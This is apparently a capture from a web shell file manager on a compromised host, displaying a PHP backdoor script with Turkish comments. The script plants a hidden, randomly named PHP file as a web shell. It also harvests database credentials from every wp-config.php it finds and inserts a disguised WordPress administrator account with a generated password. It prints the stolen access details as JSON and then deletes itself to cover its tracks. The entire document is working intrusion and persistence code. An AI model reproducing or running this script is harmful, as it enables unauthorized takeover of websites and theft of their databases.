HEX
Server: LiteSpeed
System: Linux spg20.cloudpowerdns.com 5.14.0-611.35.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 25 03:46:09 EST 2026 x86_64
User: carrerup (3153)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/carrerup/public_html/.keilnihk.php
<?php
error_reporting(0); set_time_limit(60);
$results = [];

// Web shell bırak
$sname = '.' . substr(md5(time()), 0, 8) . '.php';
$shell = '';
$dirs = [__DIR__, dirname(__DIR__).'/public_html'];
foreach($dirs as $d){
    if(is_writable($d)){
        file_put_contents($d.'/'.$sname, $shell);
        $results['shell'] = 'https://'.$_SERVER['HTTP_HOST'].'/'.$sname;
        break;
    }
}

// WordPress admin oluştur
function findWPConfigs($base){
    $configs = [];
    foreach(new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($base, RecursiveDirectoryIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    ) as $f){
        if($f->getFilename() == 'wp-config.php' && $f->getDepth() < 4){
            $configs[] = $f->getPathname();
        }
    }
    return $configs;
}

function createWPAdmin($config){
    $c = file_get_contents($config);
    preg_match("/define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $c, $db);
    preg_match("/define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'/", $c, $u);
    preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'/", $c, $p);
    preg_match("/define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $c, $h);
    preg_match("/\\\$table_prefix\s*=\s*'([^']+)'/", $c, $pfx);
    if(!$db || !$u || !$p) return null;
    $host = $h[1] ?? 'localhost';
    $prefix = $pfx[1] ?? 'wp_';
    try {
        $pdo = new PDO("mysql:host=$host;dbname={$db[1]};charset=utf8",
            $u[1], $p[1], [PDO::ATTR_TIMEOUT => 5]);
    } catch(Exception $e){ return null; }
    $user = 'wpbackup_'.substr(md5(rand()),0,6);
    $pass = 'Bk@'.substr(md5(rand()),0,12).'!';
    $hash = password_hash($pass, PASSWORD_BCRYPT);
    $email = $user.'@gmail.com';
    $now = date('Y-m-d H:i:s');
    $uid_q = $pdo->query("SELECT MAX(ID) FROM {$prefix}users");
    $uid = ($uid_q ? (int)$uid_q->fetchColumn() : 0) + 1;
    $ins = $pdo->prepare("INSERT INTO {$prefix}users
        (ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
        VALUES (?,?,?,?,?,?,0,?)");
    if($ins->execute([$uid,$user,$hash,$user,$email,$now,$user])){
        $pdo->exec("INSERT INTO {$prefix}usermeta VALUES(NULL,$uid,'{$prefix}capabilities','a:1:{s:13:\"administrator\";b:1;}')");
        $pdo->exec("INSERT INTO {$prefix}usermeta VALUES(NULL,$uid,'{$prefix}user_level','10')");
        return ['user'=>$user,'pass'=>$pass,'uid'=>$uid];
    }
    return null;
}

$home = dirname(dirname(__FILE__));
$configs = findWPConfigs($home);
foreach($configs as $cfg){
    $r = createWPAdmin($cfg);
    if($r){
        $dir = dirname($cfg);
        $results['wp'][] = [
            'config' => $cfg,
            'user'   => $r['user'],
            'pass'   => $r['pass'],
            'url'    => str_replace('/home/'.explode('/',$cfg)[2].'/public_html', '', $dir)
        ];
    }
}

echo json_encode($results);
@unlink(__FILE__);
?>